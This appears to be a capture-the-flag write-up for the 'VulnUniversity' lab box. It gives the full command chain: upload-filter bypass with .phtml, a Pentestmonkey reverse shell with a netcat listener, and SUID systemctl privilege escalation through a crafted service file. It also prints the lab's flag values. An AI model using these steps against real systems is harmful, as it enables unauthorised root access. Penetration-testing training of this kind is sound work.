VulnUniversity | Linux
Difficulty: Easy
Tags: file upload, reverse shell, privesc, systemctl, web
Tools Used: Nmap, Gobuster, Burp Suite, Netcat, Pentestmonkey, GTFOBins

A box for those who understand the power of the basics. VulnUniversity is a clean reminder that fundamental flaws still reign supreme—misconfigured uploads, lazy extension checks, and a root drop via systemctl and SUID abuse. This machine doesn't need trickery. Just knowledge, speed, and precision.

Initial Enumeration

The first step is always wide:

nmap -sC -sV -p- 10.10.151.216

Nmap gave us what we needed:

21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2
139/tcp  open  netbios-ssn Samba
445/tcp  open  netbios-ssn Samba
3128/tcp open  http-proxy  Squid 3.5.12
3333/tcp open  http        Apache 2.4.18 (Ubuntu)

Squid proxy on 3128 looked interesting, but I zeroed in on port 3333—Apache serving what looked like a custom web app. Browsing to it gave the page title: “Vuln University.”

I kicked off a directory brute-force to scrape together a clearer picture of the web interface:

gobuster dir -u http://10.10.151.216:3333 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

The results:

/images
/css
/js
/internal

/internal caught my eye.

Navigating there revealed a basic file upload form. No login, no CSRF protection—just wide open. Too easy.

User Flag

The first hurdle: bypassing upload filters.

Step one: recon with Burp Suite. I built two files:

• One with various PHP extensions (.php, .php3, .phtml, etc.)

• One with a weaponized Pentestmonkey PHP reverse shell

Then I used Burp Intruder in Sniper mode to test extension bypasses. The winner? .phtml.

💡 If you're not checking alternate extensions, you're not doing it right. .phtml and .php5 are still slipping through the cracks.

With my payload uploaded as shell.phtml, I set the trap:

nc -nvlp 4444

Then hit the file directly in the browser:

http://10.10.151.216:3333/internal/uploads/shell.phtml

And we’re in:

uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

From here, I browsed to /home/bill and scooped up the first flag:

cat /home/bill/user.txt
8bd7992fbe8a6ad22a63361004cfcedb

Time to go hunting for root.

Privilege Escalation

First instinct: check for sudo perms.

sudo -l

Denied. No sudo rights for www-data.

Next: classic SUID hunt:

find / -perm -u=s -type f 2>/dev/null

Too many false leads—standard binaries, nothing juicy—until I saw:

/bin/systemctl

That changes the game.

Why systemctl matters:

systemctl is meant for managing services, and when it's SUID, it can start and stop services as root. Combine this with the ability to write your own service file? You’ve got root-level execution from a low-priv shell.

This is a known GTFOBins trick. Here’s how it played out:

1. Create a malicious service file

priv=$(mktemp).service
echo '[Service]
ExecStart=/bin/bash -c "cat /root/root.txt > /opt/flag"
[Install]
WantedBy=multi-user.target' > $priv

This script tells systemd to run our command (cat /root/root.txt) and write it to a file in a world-readable path.

2. Link it into systemd

/bin/systemctl link $priv

That adds our service to /etc/systemd/system/ via a symlink.

3. Execute and enable it immediately

/bin/systemctl enable --now $priv

This does two things:

• enable: marks it to run at boot

• --now: runs it right now

And remember—because systemctl is SUID, it executes as root. So our payload runs as root. No sudo required.

4. Final flag grab

cat /opt/flag
f2c7bb8acc99f40ff41735f4146f6541

That’s root.

Summary / Review

This one was short and surgical. Let’s walk it back:

• Found a misconfigured file upload on a random internal path.

• Used Burp Sniper to identify a bypass with .phtml.

• Deployed a Pentestmonkey reverse shell.

• Landed in as www-data, captured user flag from bill.

• Escalated to root via SUID-enabled systemctl by injecting a custom service.

🧠 Key takeaways:

• Upload validation is still botched in 2025. Extension filters alone don’t cut it.

• systemctl is dangerous when SUID. If you see it, think root.

• Never underestimate the effectiveness of Burp Intruder paired with classic payloads.

This was a textbook CTF chain. Easy to execute. Dangerous in production. Perfect for OSCP prep.

Command Recap

nmap -sC -sV -p- 10.10.151.216  
gobuster dir -u http://10.10.151.216:3333 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt  
nc -nvlp 4444  
find / -perm -u=s -type f 2>/dev/null  
priv=$(mktemp).service  
echo '[Service]
ExecStart=/bin/bash -c "cat /root/root.txt > /opt/flag"
[Install]
WantedBy=multi-user.target' > $priv  
/bin/systemctl link $priv  
/bin/systemctl enable --now $priv  
cat /opt/flag

Final Thoughts

No noise. No drama. Just a vulnerable upload form, a bad SUID config, and the ability to chain them like a pro.

Another one rooted. On to the next.